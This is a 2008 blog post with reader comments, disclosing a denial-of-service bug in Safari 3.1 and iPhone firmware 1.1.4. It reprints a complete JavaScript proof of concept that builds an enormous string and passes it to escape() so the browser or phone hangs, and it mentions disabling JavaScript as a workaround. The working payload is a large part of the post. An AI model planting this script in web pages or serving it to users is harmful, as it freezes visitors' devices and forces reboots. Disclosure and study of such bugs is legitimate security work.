Safari 3.1 JavaScript DoS Released
Georgi Guninski has discovered a denial of service vulnerability in Safari 3.1 which causes the browser to hang, and not crash. This DoS also affects iPhones running firmware version 1.1.4 and, all other earlier versions.
When visiting a site with the malformed JavaScript, the iPhone will lock up becoming causing the user to have to reboot the phone. The current workaround is to disable JavaScript on your iPhone and or iPod touch.
Below is the source of PoC which will trigger the hang (not a crash).
Copyright Georgi Guninski
Cannot be used in vulnerability databases
Especially securityfocus/mitre/cve/cert
SCRIPT
var s=String.fromCharCode(257);
var ki=”";
var me=”";
for(i=0;i<1024;i++)
{ki=ki+s;}
for(i=0;i<1024;i++)
{me=me+ki;}
var ov=s;
for(i=0;i<28;i++) ov += ov;
for(i=0;i<88;i++) ov += me;
alert("done generating");
var fuckbill=escape(ov);
alert("done escape");
alert(fuckbill);
SCRIPT
Bert JW Regeer Said,
March 27, 2008 @ 2:15 am
Is there an link to the exploit listing on his website? I am unable to find it what so ever, so I am wondering where you got this.
Bert JW Regeer
Tom Ferris Said,
April 1, 2008 @ 2:09 pm
The proof-of-concept code is within the post… ?
Rick Said,
April 25, 2008 @ 6:24 am
Tom: where’s GG hanging out these days? Guninski.com hasn’t been updated in years.
Tom Ferris Said,
April 25, 2008 @ 9:52 am
Rick: Last I heard, he was working at some grocery store..